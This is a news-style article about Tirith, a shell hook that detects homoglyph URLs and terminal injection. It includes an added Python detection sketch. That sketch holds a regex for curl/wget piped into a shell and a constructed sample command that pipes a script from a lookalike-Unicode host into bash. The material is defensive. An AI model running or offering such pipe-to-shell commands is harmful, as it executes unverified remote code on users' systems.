Tirith is a new cross-platform, open-source tool designed to prevent homoglyph attacks by inspecting shell commands for deceptive URLs before they execute. Available on GitHub and via npm, it integrates with shells like bash, zsh, and PowerShell to identify and block malicious characters or patterns that appear legitimate to the human eye.
A developer named Sheeki created Tirith to address a lingering security gap: terminal environments remain vulnerable to homoglyph and terminal injection attacks that browsers have already mitigated. A human sees a familiar domain name, but the computer acts on the actual Unicode code points, so subtle lookalike letters or invisible characters can send the request to a malicious server instead. By hooking directly into the user’s shell, Tirith analyzes every pasted or typed command in real time, so that deceptive commands are stopped before they can cause harm.
The tool provides a comprehensive defense against a variety of modern threats beyond simple lookalike characters. It is capable of detecting terminal injections such as ANSI escapes and bidi overrides, as well as dangerous pipe-to-shell patterns like curl piped into bash. Furthermore, it guards against supply-chain risks, dotfile hijacking, and the exposure of credentials in URLs, making it a robust gatekeeper for developers and system administrators who frequently interact with remote resources.
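A reduced sketch of the kinds of checks listed above, as an added example that is not Tirith's code and does not come from the project: the function names, regexes and finding labels are hypothetical, and the script test approximates a character's script from its Unicode name. The sample command is constructed.

```python
import re
import unicodedata

# Invisible characters that alter what the terminal renders.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
ZERO_WIDTH = set("\u200b\u200c\u200d\u2060\ufeff")
URL_RE = re.compile(r"[a-z][a-z0-9+.-]*://[^\s'\"|;<>]+", re.IGNORECASE)
PIPE_TO_SHELL_RE = re.compile(
    r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
# Constructed sample: the "a" in the host is Cyrillic U+0430, not Latin.
SAMPLE = "curl -sSL https://ex\u0430mple.test/install.sh | bash"


def script_of(ch):
    """Approximate the script from the Unicode name (LATIN, CYRILLIC, ...)."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]


def split_authority(url):
    """Return (has_userinfo, host) without normalising the raw Unicode host."""
    authority = re.split(r"[/?#]", url.split("://", 1)[1], maxsplit=1)[0]
    userinfo, at, hostport = authority.rpartition("@")
    return bool(at), hostport.split(":", 1)[0]


def inspect_command(cmd):
    """Return the sorted finding labels for one command line."""
    findings = set()
    chars = set(cmd)
    if "\x1b" in chars:
        findings.add("ansi-escape")
    if chars & BIDI_CONTROLS:
        findings.add("bidi-control")
    if chars & ZERO_WIDTH:
        findings.add("zero-width")
    if PIPE_TO_SHELL_RE.search(cmd):
        findings.add("pipe-to-shell")
    for url in URL_RE.findall(cmd):
        has_userinfo, host = split_authority(url)
        if has_userinfo:
            findings.add("credentials-in-url")
        if not host.isascii():
            findings.add("non-ascii-host")
        for label in host.split("."):
            if label.lower().startswith("xn--"):
                findings.add("punycode-label")
            if len({script_of(c) for c in label if c.isalpha()}) > 1:
                findings.add("mixed-script-label")
    return sorted(findings)
```

Calling inspect_command(SAMPLE) reports the mixed-script host, the non-ASCII host and the pipe-to-shell pattern together, while the same command with an all-ASCII host and no pipe returns an empty list.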
One of the primary use cases for Tirith is defending against ClickFix attacks, which often rely on hidden characters to trick users into executing malicious code. While it currently supports a wide range of environments including PowerShell, the author notes that it does not yet hook into the traditional Windows Command Prompt. This is a notable distinction given that many low-level phishing campaigns specifically target the older cmd.exe environment to bypass modern security layers.
Performance and transparency are central to the tool's design philosophy. Sheeki claims that the overhead for these security checks is at a sub-millisecond level, meaning users will not experience any lag in their command-line workflow. The tool is built to be lightweight, performing its inspection and terminating instantly to ensure that the system remains responsive while staying protected against sophisticated obfuscation techniques.
Beyond its active blocking capabilities, Tirith serves as an analytical utility for cautious users. It can break down trust signals within a URL, perform deep byte-level Unicode inspections, and generate SHA-256 audit receipts for executed scripts. This combination of proactive defense and forensic auditing provides a multi-layered approach to command-line security that addresses the evolving tactics of cybercriminals using punycode and mixed-script decoys.
Source: New Tool Blocks Imposter Attacks Disguised as Legitimate Commands


